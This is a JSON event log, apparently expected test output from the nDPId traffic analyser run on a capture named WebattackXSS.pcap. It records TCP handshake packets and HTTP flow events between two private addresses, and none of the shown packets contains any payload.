-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":3,"flow_last_seen":1499347981783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347981783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XEtAAD4GaY2sEAABwKgKMoekAFBFSZoJZQBTI4AQAOV8ZAAAAQEICgE8xkMD5pe3"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347983061,"flow_last_seen":1499347983061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347983061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1499347983061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347983061,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HjdAAD4Gp5msEAABwKgKMoeyAFDTp9m1AAAAAKACchBg5QAAAgQFtAQCCAoBPMeCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":2,"flow_last_seen":1499347983061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347983061,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh7KKfm1X06fZtqAScSDNEQAAAgQFtAQCCAoD5pj2ATzHggEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":3,"flow_last_seen":1499347983062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347983062,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HjhAAD4Gp6CsEAABwKgKMoeyAFDTp9m2in5tWIAQAOVsGQAAAQEICgE8x4ID5pj2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347984370,"flow_last_seen":1499347984370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347984370,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1499347984370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347984370,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81w5AAD4G7sGsEAABwKgKMofAAFB4CR\/HAAAAAKACchB1HQAAAgQFtAQCCAoBPMjJAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":2,"flow_last_seen":1499347984370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347984370,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh8AzI3sOeAkfyKAScSAppgAAAgQFtAQCCAoD5po+ATzIyQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":3,"flow_last_seen":1499347984371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347984371,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01w9AAD4G7sisEAABwKgKMofAAFB4CR\/IMyN7D4AQAOXIrAAAAQEICgE8yMoD5po+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8445,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347985686,"flow_last_seen":1499347985686,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347985686,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8445,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1499347985686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347985686,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UVJAAD4GdH6sEAABwKgKMofOAFAxwJtBAAAAAKACchA+lAAAAgQFtAQCCAoBPMoTAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":2,"flow_last_seen":1499347985687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347985687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh84CN1TUMcCbQqAScSBI+gAAAgQFtAQCCAoD5puHATzKEwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8447,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":3,"flow_last_seen":1499347985687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347985687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UVNAAD4GdIWsEAABwKgKMofOAFAxwJtCAjdU1YAQAOXoAQAAAQEICgE8yhMD5puH"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347988233,"flow_last_seen":1499347988233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988233,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1499347988233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347988233,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aCNAAD4GXa2sEAABwKgKMofoAFBt56SsAAAAAKACchD2awAAAgQFtAQCCAoBPMyPAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":2,"flow_last_seen":1499347988233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347988233,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh+gH+IEYbeekraAScSDMUAAAAgQFtAQCCAoD5p4DATzMjwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8468,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":3,"flow_last_seen":1499347988234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347988234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aCRAAD4GXbSsEAABwKgKMofoAFBt56StB\/iBGYAQAOVrWAAAAQEICgE8zI8D5p4D"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347855324,"flow_last_seen":1499347860860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347855324,"flow_last_seen":1499347860860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347856593,"flow_last_seen":1499347861860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33418,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347856593,"flow_last_seen":1499347861860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33418,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347859192,"flow_last_seen":1499347864861,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33444,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347859192,"flow_last_seen":1499347864861,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347860489,"flow_last_seen":1499347865862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33458,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347860489,"flow_last_seen":1499347865862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33458,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347861783,"flow_last_seen":1499347866863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33472,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347861783,"flow_last_seen":1499347866863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33472,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347863072,"flow_last_seen":1499347868864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33486,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347863072,"flow_last_seen":1499347868864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347864367,"flow_last_seen":1499347869864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347864367,"flow_last_seen":1499347869864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347989526,"flow_last_seen":1499347989526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347989526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1499347989526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347989526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8S9BAAD4GegCsEAABwKgKMof2AFDafYYCAAAAAKACchCnLgAAAgQFtAQCCAoBPM3SAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8479,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":2,"flow_last_seen":1499347989526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347989526,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh\/a7HZT72n2GA6AScSC0xwAAAgQFtAQCCAoD5p9GATzN0gEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8480,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":3,"flow_last_seen":1499347989526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347989526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0S9FAAD4GegesEAABwKgKMof2AFDafYYDux2U\/IAQAOVTzgAAAQEICgE8zdMD5p9G"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347992139,"flow_last_seen":1499347992139,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347992139,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1499347992139,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347992139,"pkt":"ABm5CmnxAMGxFOsxCABFAAA866dAAD4G2iisEAABwKgKMogQAFBfGDvHAAAAAKACchBqJwAAAgQFtAQCCAoBPNBgAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8501,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":2,"flow_last_seen":1499347992139,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347992139,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiBBHAQA0Xxg7yKAScSB+FgAAAgQFtAQCCAoD5qHUATzQYAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8502,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":3,"flow_last_seen":1499347992140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347992140,"pkt":"ABm5CmnxAMGxFOsxCABFAAA066hAAD4G2i+sEAABwKgKMogQAFBfGDvIRwEANYAQAOUdHgAAAQEICgE80GAD5qHU"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347993411,"flow_last_seen":1499347993411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347993411,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1499347993411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347993411,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wWNAAD4GBG2sEAABwKgKMogeAFD5yRD9AAAAAKACchD48wAAAgQFtAQCCAoBPNGeAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":2,"flow_last_seen":1499347993411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347993411,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiB6gRZIr+ckQ\/qAScSAgaQAAAgQFtAQCCAoD5qMSATzRngEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":3,"flow_last_seen":1499347993412,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347993412,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wWRAAD4GBHSsEAABwKgKMogeAFD5yRD+oEWSLIAQAOW\/cAAAAQEICgE80Z4D5qMS"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347994680,"flow_last_seen":1499347994680,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347994680,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1499347994680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347994680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eXlAAD4GTFesEAABwKgKMogsAFCPtauiAAAAAKACchDHFwAAAgQFtAQCCAoBPNLbAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":2,"flow_last_seen":1499347994680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347994680,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiCwnn9QNj7Wro6AScSAkFAAAAgQFtAQCCAoD5qRPATzS2wEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":3,"flow_last_seen":1499347994681,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347994681,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eXpAAD4GTF6sEAABwKgKMogsAFCPtaujJ5\/UDoAQAOXDGwAAAQEICgE80tsD5qRP"} 